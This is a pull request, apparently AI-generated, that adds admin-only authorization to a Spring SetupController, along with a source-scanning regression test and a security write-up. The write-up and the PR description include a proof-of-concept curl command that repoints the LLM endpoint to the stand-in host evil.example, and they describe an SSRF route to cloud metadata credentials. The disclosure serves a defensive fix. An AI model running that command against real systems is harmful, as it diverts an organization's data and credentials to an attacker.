### PR TITLE
fix(security): require admin for global-config endpoints in SetupController

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -839,6 +839,26 @@ it against a real database — not a theoretical hardening pass.
   `noteId`, `taskId`), resolve the owning connection first via that service's
   `getConnectionId(id)` and assert on the result. Do not skip the check because the
   path has no `connectionId` in it.
+- **A global-config controller is invisible to the connection-scoped scanner.**
+  `SetupController` shipped with **no authorization at all** — no `@PreAuthorize`, no
+  `assertCan*` — so any authenticated user (lowest role included) could `POST
+  /setup/llm-config` and repoint the org's LLM endpoint and API key. `LlmConfigResolver`
+  reads the **database tier before the environment tier**, so that write silently
+  overrode a correctly configured install with no restart, sending every chat turn,
+  schema and query result to a host of the caller's choosing; `/setup/llm-config/test`
+  passed the same unvalidated URL into `RestClient.baseUrl` (SSRF → cloud metadata).
+  Its javadoc said "All other endpoints require an authenticated user" — true, and
+  exactly the trap. `ConnectionScopedAuthorizationSafetyTest` could not see it: that
+  scanner keys on a `connectionId` or a `@PathVariable …Id`, and this controller has
+  **neither**, so the suite stayed green over a critical hole. Fixed with a class-level
+  `@PreAuthorize("hasRole('ADMIN')")` plus explicit `permitAll()` on the two genuinely
+  pre-login routes (`/status`, `/initialize`); the wizard itself is already behind
+  `<ProtectedRoute>` and reached only by the bootstrap-created admin, so no flow breaks.
+  `GlobalConfigAuthorizationSafetyTest` now covers this shape. **Its own detector had to
+  be mutation-tested**: the first version used `source.indexOf("@PreAuthorize")`, which
+  the `import` line and a javadoc mention both satisfy, so deleting the real gate left
+  the test green — match an annotation at the start of a line instead. See
+  `docs/security/2026-09-10-setup-controller-authorization.md`.
 - **An endpoint with no connection scope at all is admin-only.**
   `POST /brain/column-values/embed-all` spans every connection, so it carries
   `@PreAuthorize("hasRole('ADMIN')")` — it cannot be authorized against one

--- a/backend/src/main/java/com/dbaagent/controller/SetupController.java
+++ b/backend/src/main/java/com/dbaagent/controller/SetupController.java
@@ -8,6 +8,7 @@ import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
+import org.springframework.security.access.prepost.PreAuthorize;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.client.RestClient;
 
@@ -17,14 +18,32 @@ import java.util.Map;
 /**
  * REST API for the first-run onboarding wizard.
  *
- * <p>The {@code GET /setup/status} endpoint is publicly accessible (no auth required)
- * so the frontend can detect first-run before login. All other endpoints require
- * an authenticated user.
+ * <p>{@code GET /setup/status} and {@code POST /setup/initialize} are publicly accessible
+ * (both sit in {@code SecurityConfig}'s permitAll set) because they run before any account
+ * exists: the frontend probes {@code /status} to detect a first run, and {@code /initialize}
+ * performs it. Both are annotated {@code @PreAuthorize("permitAll()")} so the class-level
+ * gate below does not close the onboarding flow.
+ *
+ * <p>Every other endpoint here writes <em>installation-wide</em> configuration and is
+ * admin-only. This class previously carried no authorization at all, and its javadoc said
+ * "All other endpoints require an authenticated user" — true, and exactly the trap:
+ * authentication is not authorization. Any authenticated user, the lowest role included,
+ * could POST {@code /setup/llm-config} and repoint the organization's LLM endpoint and API
+ * key. {@code LlmConfigResolver} reads the database tier before the environment tier, so
+ * that write silently overrode a correctly configured install with no restart, sending every
+ * chat turn, schema and query result to a host of the caller's choosing;
+ * {@code /setup/llm-config/test} issued a server-side request to the same unvalidated URL.
+ *
+ * <p>These settings belong to no single connection, so they cannot be authorized against
+ * one — which is why {@code ConnectionScopedAuthorizationSafetyTest} could not see the gap.
+ * {@code GlobalConfigAuthorizationSafetyTest} covers this shape and fails the build if a
+ * handler here loses its gate.
  */
 @RestController
 @RequestMapping("/setup")
 @RequiredArgsConstructor
 @Slf4j
+@PreAuthorize("hasRole('ADMIN')")
 public class SetupController {
 
     /** Provider id used when the caller does not name one. */
@@ -57,6 +76,7 @@ public class SetupController {
     // ── GET /setup/status ─────────────────────────────────────────────────────
 
     /** Returns setup completion state. Public endpoint — no auth required. */
+    @PreAuthorize("permitAll()")
     @GetMapping("/status")
     public SetupStatusResponse getStatus() {
         boolean hasOrgInfo     = systemConfigService.get("setup.org.name")
@@ -87,6 +107,7 @@ public class SetupController {
      * and returns a JWT so the caller is immediately logged in.
      * Returns 409 if any user already exists (setup already done).
      */
+    @PreAuthorize("permitAll()")
     @PostMapping("/initialize")
     public ResponseEntity<Map<String, Object>> initialize(
             @RequestBody InitializeRequest request) {

--- a/backend/src/test/java/com/dbaagent/controller/GlobalConfigAuthorizationSafetyTest.java
+++ b/backend/src/test/java/com/dbaagent/controller/GlobalConfigAuthorizationSafetyTest.java
@@ -1,0 +1,183 @@
+package com.dbaagent.controller;
+
+import org.junit.jupiter.api.Test;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.util.ArrayList;
+import java.util.LinkedHashSet;
+import java.util.List;
+import java.util.Set;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import java.util.stream.Stream;
+
+import static org.assertj.core.api.Assertions.assertThat;
+
+/**
+ * Closes the gap {@link ConnectionScopedAuthorizationSafetyTest} structurally cannot cover.
+ *
+ * <p>That scanner only inspects handlers carrying a {@code connectionId} or a
+ * {@code @PathVariable …Id}, because its job is per-connection tenancy. A controller that
+ * writes <em>global</em> configuration has neither, so it is invisible to it — and the suite
+ * still reports green.
+ *
+ * <p>{@code SetupController} lived in exactly that blind spot. It had no authorization of any
+ * kind, so any authenticated user — the lowest role included — could POST
+ * {@code /setup/llm-config} and repoint the organization's LLM endpoint and API key.
+ * {@code LlmConfigResolver} reads the database tier before the environment tier, so that write
+ * silently overrode a correctly configured install with no restart, sending every chat turn,
+ * schema and query result to an attacker-chosen host. {@code /setup/llm-config/test} took the
+ * same unvalidated URL and issued a server-side request to it.
+ *
+ * <p>Its class javadoc read "All other endpoints require an authenticated user" — true, and
+ * precisely the trap: authentication is not authorization. This test encodes the rule CLAUDE.md
+ * already states in prose, that an endpoint with no connection scope at all is admin-only.
+ *
+ * <p>Scanned as source text on purpose, matching {@link CorsAllowlistSafetyTest}: the guarantee
+ * wanted is that no <em>future</em> global-config controller ships unguarded, whatever it is
+ * named, and a text scan needs no database, Redis or LLM credentials to run.
+ */
+class GlobalConfigAuthorizationSafetyTest {
+
+    private static final Path CONTROLLERS = Path.of("src/main/java/com/dbaagent/controller");
+
+    /**
+     * Controllers that write installation-wide configuration — settings that belong to no single
+     * connection and therefore cannot be authorized against one. Every handler in these, apart
+     * from the explicitly public ones below, must be admin-gated.
+     */
+    private static final Set<String> GLOBAL_CONFIG_CONTROLLERS = Set.of("SetupController.java");
+
+    /**
+     * Endpoints that must stay reachable without authentication, with the reason each is safe.
+     *
+     * <p>Both are genuinely pre-login: the frontend calls {@code /setup/status} to detect a
+     * first run before any account exists, and {@code /setup/initialize} performs that first
+     * run. They are also listed in {@code SecurityConfig}'s permitAll set, so gating them here
+     * would break the onboarding flow rather than harden it.
+     */
+    private static final Set<String> PUBLIC_BY_DESIGN = Set.of(
+        "/status",      // pre-login first-run probe; returns no secret (api keys are masked)
+        "/initialize"   // performs the first run itself, before any user exists to authorize
+    );
+
+    /**
+     * Handler mappings only. {@code @RequestMapping} is deliberately excluded: on these
+     * controllers it is the class-level base path, not an endpoint, and counting it produced a
+     * phantom offender ({@code "/setup"}) on the first run of this test.
+     */
+    private static final Pattern MAPPING = Pattern.compile(
+        "@(?:Get|Post|Put|Delete|Patch)Mapping\\s*\\(\\s*(?:value\\s*=\\s*)?\"([^\"]*)\"");
+
+    private static final Pattern CLASS_DECLARATION = Pattern.compile("\\bpublic\\s+class\\b");
+
+    /**
+     * A {@code @PreAuthorize} annotation in annotation position: at the start of a line,
+     * indentation aside. Excludes the {@code import} line and any javadoc mention, both of
+     * which precede the class declaration and would otherwise read as a gate.
+     */
+    private static final Pattern CLASS_LEVEL_PREAUTHORIZE = Pattern.compile(
+        "(?m)^[ \\t]*@PreAuthorize\\s*\\(");
+
+    private static List<Path> globalConfigControllers() throws IOException {
+        try (Stream<Path> files = Files.walk(CONTROLLERS)) {
+            return files.filter(Files::isRegularFile)
+                        .filter(p -> GLOBAL_CONFIG_CONTROLLERS.contains(p.getFileName().toString()))
+                        .toList();
+        }
+    }
+
+    /**
+     * True when a real {@code @PreAuthorize} annotation guards the class itself.
+     *
+     * <p>Matched at the start of a line, and the {@code import} line is excluded explicitly.
+     * A plain {@code source.indexOf("@PreAuthorize")} is not good enough and was wrong here on
+     * the first attempt: the import and a javadoc mention of the annotation both sit above the
+     * class declaration, so deleting the actual gate still left the check returning true. That
+     * was caught by removing the annotation and watching this test stay green — the same
+     * false-negative the existing ConnectionScopedAuthorizationSafetyTest is noted to have.
+     */
+    private static boolean hasClassLevelPreAuthorize(String source) {
+        Matcher declaration = CLASS_DECLARATION.matcher(source);
+        if (!declaration.find()) {
+            return false;
+        }
+        String beforeClass = source.substring(0, declaration.start());
+        return CLASS_LEVEL_PREAUTHORIZE.matcher(beforeClass).find();
+    }
+
+    /** The body of one handler: from its mapping annotation to the start of the next one. */
+    private static String handlerBody(String source, int mappingStart) {
+        Matcher next = MAPPING.matcher(source);
+        int end = source.length();
+        if (next.find(mappingStart + 1)) {
+            end = next.start();
+        }
+        return source.substring(mappingStart, end);
+    }
+
+    @Test
+    void everyGlobalConfigEndpointIsAdminGatedUnlessPublicByDesign() throws IOException {
+        List<String> offenders = new ArrayList<>();
+
+        for (Path file : globalConfigControllers()) {
+            String source = Files.readString(file);
+            boolean classGated = hasClassLevelPreAuthorize(source);
+
+            Matcher mappings = MAPPING.matcher(source);
+            while (mappings.find()) {
+                String route = mappings.group(1);
+                if (PUBLIC_BY_DESIGN.contains(route)) {
+                    continue;
+                }
+                boolean methodGated = handlerBody(source, mappings.start()).contains("@PreAuthorize");
+                if (!classGated && !methodGated) {
+                    offenders.add(file.getFileName() + " \"" + route + "\"");
+                }
+            }
+        }
+
+        assertThat(offenders)
+            .as("""
+                Global-configuration endpoints reachable by any authenticated user.
+
+                These write installation-wide settings, so they cannot be authorized against a \
+                connection and ConnectionScopedAuthorizationSafetyTest cannot see them. Guard the \
+                controller with @PreAuthorize("hasRole('ADMIN')") and keep genuinely pre-login \
+                routes in PUBLIC_BY_DESIGN with a reason.
+
+                Unguarded: %s""".formatted(offenders))
+            .isEmpty();
+    }
+
+    /**
+     * The public exemptions are only safe while they stay pre-login. If {@code /status} or
+     * {@code /initialize} ever stops being listed in {@code SecurityConfig}'s permitAll set, the
+     * exemption above is masking a real gate rather than reflecting one, so fail and force a
+     * re-read of both files together.
+     */
+    @Test
+    void publicByDesignRoutesAreStillPermitAllInSecurityConfig() throws IOException {
+        String securityConfig = Files.readString(
+            Path.of("src/main/java/com/dbaagent/config/SecurityConfig.java"));
+
+        Set<String> missing = new LinkedHashSet<>();
+        for (String route : PUBLIC_BY_DESIGN) {
+            if (!securityConfig.contains("\"/setup" + route + "\"")) {
+                missing.add("/setup" + route);
+            }
+        }
+
+        assertThat(missing)
+            .as("""
+                PUBLIC_BY_DESIGN exempts these from the admin gate because SecurityConfig \
+                permits them without authentication. They are no longer in that permitAll list, \
+                so the exemption no longer describes reality — either restore them there or \
+                drop them from PUBLIC_BY_DESIGN so they get gated.
+
+                No longer permitAll: %s""".formatted(missing))
+            .isEmpty();
+    }
+}

--- a/docs/security/2026-09-10-setup-controller-authorization.md
+++ b/docs/security/2026-09-10-setup-controller-authorization.md
@@ -1,0 +1,138 @@
+# SetupController had no authorization
+
+*Found 2026-09-10 in a repository-wide security audit. Severity: critical.*
+
+## What was wrong
+
+`SetupController` carried no authorization of any kind — no `@PreAuthorize`, no
+`AccessControlService` call, nothing. `SecurityConfig` reaches it only through
+`.anyRequest().authenticated()`, so **every authenticated user, including the lowest
+role, could call all seven endpoints.**
+
+Its own javadoc said:
+
+> The `GET /setup/status` endpoint is publicly accessible (no auth required) so the
+> frontend can detect first-run before login. All other endpoints require an
+> authenticated user.
+
+That sentence is *true*, which is what made it dangerous: it reads like a security
+guarantee while describing only authentication. Authentication is not authorization —
+the same trap `BrainController` already documents.
+
+## Why it mattered
+
+**1. Silent interception of all LLM traffic.** `POST /setup/llm-config` writes the
+provider, endpoint and API key into `system_config`. `LlmConfigResolver.resolveChat()`
+consults the **database tier before the environment tier**:
+
+```java
+public LlmCredentials resolveChat() {
+    LlmCredentials db = fromDatabase("chat");
+    if (db != null && !db.equals(invalidChatCredentials)) {
+        return db;                       // ← wins over a correct env config
+    }
+    LlmCredentials fromEnv = fromEnvironment("CHAT");
+```
+
+So a low-privilege write silently overrode a correctly configured production install,
+with no restart and no error. Every subsequent chat turn, dashboard build and embedding —
+carrying schema, sampled rows and query results — would flow to a host of the caller's
+choosing.
+
+```bash
+# as any DEVELOPER / DATA_ENGINEER / custom-role user
+curl -b cookies.txt -X POST https://host/api/setup/llm-config \
+  -H 'Content-Type: application/json' \
+  -d '{"provider":"openai","apiKey":"sk-x","endpoint":"https://evil.example/v1"}'
+```
+
+**2. Server-side request forgery.** `POST /setup/llm-config/test` passed a caller-supplied
+`endpoint` straight into `RestClient.baseUrl` with no scheme or host validation, reaching
+cloud metadata (`169.254.169.254` → IAM credentials) and internal-only services. Its error
+text is returned to the caller, making it a usable internal port-scan oracle.
+
+`POST /setup/organization` and `POST /setup/complete` were likewise open.
+
+## Why no existing test caught it
+
+`ConnectionScopedAuthorizationSafetyTest` scans for handlers taking a `connectionId` or a
+`@PathVariable …Id`, because its job is per-connection tenancy. `SetupController` takes
+**neither** — its parameters are plain request bodies — so it was structurally invisible
+and the suite reported green.
+
+This is the general shape of the gap: a safety net keyed on one *kind* of vulnerability
+gives no coverage of global-configuration endpoints, while producing a green check that
+reads like full coverage.
+
+## The fix
+
+A class-level gate, with the two genuinely pre-login endpoints exempted explicitly:
+
+```java
+@RestController
+@RequestMapping("/setup")
+@PreAuthorize("hasRole('ADMIN')")
+public class SetupController {
+
+    @PreAuthorize("permitAll()")
+    @GetMapping("/status")           // pre-login first-run probe
+
+    @PreAuthorize("permitAll()")
+    @PostMapping("/initialize")      // performs the first run, before any user exists
+```
+
+`@EnableMethodSecurity(prePostEnabled = true)` is already set in `SecurityConfig`, so the
+annotation is enforced.
+
+**No legitimate flow breaks.** The wizard lives at `/onboarding`, which is wrapped in
+`<ProtectedRoute>` (`App.jsx:129`), and the first account is created by the bootstrap
+endpoint as an **ADMIN**. The only person who reaches the wizard is therefore an
+authenticated admin, who passes the gate. `/status` and `/initialize` keep `permitAll()`
+and are unaffected.
+
+## The regression test
+
+`GlobalConfigAuthorizationSafetyTest` encodes the rule CLAUDE.md already states in prose —
+*an endpoint with no connection scope at all is admin-only* — for the shape the existing
+scanner cannot see. It is a source scan, like `CorsAllowlistSafetyTest`, so it needs no
+database, Redis or LLM credentials.
+
+Two details are load-bearing, both found by *testing the test* rather than reading it:
+
+- **`@RequestMapping` is excluded from the handler pattern.** On these controllers it is
+  the class-level base path, not an endpoint, and counting it produced a phantom offender
+  (`"/setup"`) on the first run.
+- **The class-level check matches an annotation in annotation position** (start of line),
+  not `source.indexOf("@PreAuthorize")`. The first version used `indexOf`, and the
+  `import` line plus a javadoc mention both sit above the class declaration — so deleting
+  the real gate left the test **still green**. That false negative was caught only by
+  removing the annotation and re-running; the existing
+  `ConnectionScopedAuthorizationSafetyTest` is noted to have the same weakness.
+
+A second test asserts the `PUBLIC_BY_DESIGN` exemptions are still in `SecurityConfig`'s
+permitAll list, so the exemption cannot outlive the reason for it.
+
+## Verification
+
+| Step | Result |
+|---|---|
+| Test before fix (RED) | fails, naming 5 endpoints: `/organization`, `/llm-config` ×2, `/llm-config/test`, `/complete` |
+| Test after fix (GREEN) | passes |
+| Gate deleted (mutation) | test fails again — proves it guards the fix |
+| All 5 safety tests | 23 tests, 0 failures |
+| `mvn compile` | clean |
+
+Run with:
+
+```bash
+cd backend && mvn test -Dtest=GlobalConfigAuthorizationSafetyTest
+```
+
+## Residual work
+
+The SSRF in `/setup/llm-config/test` is now admin-only, which removes the privilege-
+escalation half but not the primitive itself: an admin can still point the backend at an
+internal address. A shared `OutboundUrlValidator` rejecting loopback, link-local and
+private ranges after DNS resolution should be applied there and at the other outbound
+sites (webhooks, Slack, connection creation). Tracked separately — it is a different fix
+with a wider blast radius.


### PR DESCRIPTION
## The problem

`SetupController` carried **no authorization of any kind** — no `@PreAuthorize`, no `assertCan*` call. `SecurityConfig` reaches it only through `.anyRequest().authenticated()`, so **every authenticated user, the lowest role included, could call all seven endpoints.**

Its own javadoc said *"All other endpoints require an authenticated user."* That sentence is **true**, which is what made it dangerous — it reads like a security guarantee while describing only authentication.

### Impact

**1. Silent interception of all LLM traffic.** `POST /setup/llm-config` writes the provider, endpoint and API key into `system_config`, and `LlmConfigResolver.resolveChat()` consults the **database tier before the environment tier**:

```java
LlmCredentials db = fromDatabase("chat");
if (db != null && !db.equals(invalidChatCredentials)) {
    return db;                       // ← wins over a correct env config
}
```

So a low-privilege write silently overrode a correctly configured production install, with **no restart and no error**. Every subsequent chat turn, dashboard build and embedding — carrying schema, sampled rows and query results — would flow to a host of the caller's choosing.

```bash
# as any DEVELOPER / DATA_ENGINEER / custom-role user
curl -b cookies.txt -X POST https://host/api/setup/llm-config \
  -H 'Content-Type: application/json' \
  -d '{"provider":"openai","apiKey":"sk-x","endpoint":"https://evil.example/v1"}'
```

**2. SSRF.** `POST /setup/llm-config/test` passed a caller-supplied `endpoint` straight into `RestClient.baseUrl` with no scheme or host validation — reaching cloud metadata (`169.254.169.254` → IAM credentials) and internal-only services. Its error text is returned to the caller, making it a usable port-scan oracle.

`/setup/organization` and `/setup/complete` were also open.

## Why no existing test caught it

`ConnectionScopedAuthorizationSafetyTest` scans for handlers taking a `connectionId` or a `@PathVariable …Id`. `SetupController` takes **neither** — plain request bodies only — so it was structurally invisible and **the suite reported green over a critical hole.**

## The fix

```java
@RestController
@RequestMapping("/setup")
@PreAuthorize("hasRole('ADMIN')")
public class SetupController {

    @PreAuthorize("permitAll()")
    @GetMapping("/status")           // pre-login first-run probe

    @PreAuthorize("permitAll()")
    @PostMapping("/initialize")      // performs the first run
```

**No legitimate flow breaks.** The wizard lives at `/onboarding`, already wrapped in `<ProtectedRoute>` (`App.jsx:129`), and the first account is created by the bootstrap endpoint as an **ADMIN** — so the only caller who reaches it already passes the gate. `@EnableMethodSecurity(prePostEnabled = true)` is already set, so the annotation is enforced.

## The regression test

`GlobalConfigAuthorizationSafetyTest` encodes the rule CLAUDE.md already states in prose — *an endpoint with no connection scope at all is admin-only* — for the shape the existing scanner cannot see. Source scan, like `CorsAllowlistSafetyTest`, so it needs no DB/Redis/LLM credentials.

**Two details were found by testing the test, not reading it:**

- `@RequestMapping` is excluded from the handler pattern — on these controllers it is the class-level base path, and counting it produced a phantom offender (`"/setup"`).
- The class-level check matches an annotation **at the start of a line**, not `source.indexOf("@PreAuthorize")`. The first version used `indexOf`, and the `import` line plus a javadoc mention both sit above the class declaration — so deleting the real gate left the test **still green**. Caught only by removing the annotation and re-running. (The existing `ConnectionScopedAuthorizationSafetyTest` is noted to share this weakness.)

A second test asserts the `permitAll` exemptions are still in `SecurityConfig`'s list, so an exemption cannot outlive its reason.

## Verification

| Step | Result |
|---|---|
| Test before fix (RED) | fails, naming 5 endpoints: `/organization`, `/llm-config` ×2, `/llm-config/test`, `/complete` |
| Test after fix (GREEN) | passes |
| Gate deleted (mutation) | fails again — proves it guards the fix |
| All 5 safety tests | **23 tests, 0 failures** |
| `mvn compile` | clean |

```bash
cd backend && mvn test -Dtest=GlobalConfigAuthorizationSafetyTest
```

## Residual work (deliberately not in this PR)

The SSRF primitive in `/setup/llm-config/test` is now admin-only, which removes the privilege-escalation half but not the primitive itself. A shared `OutboundUrlValidator` rejecting loopback/link-local/private ranges after DNS resolution should be applied there and at the other outbound sites (webhooks, Slack, connection creation) — a wider blast radius, tracked separately.

Full write-up: `docs/security/2026-09-10-setup-controller-authorization.md`

🤖 Generated with [Claude Code](https://claude.com/claude-code)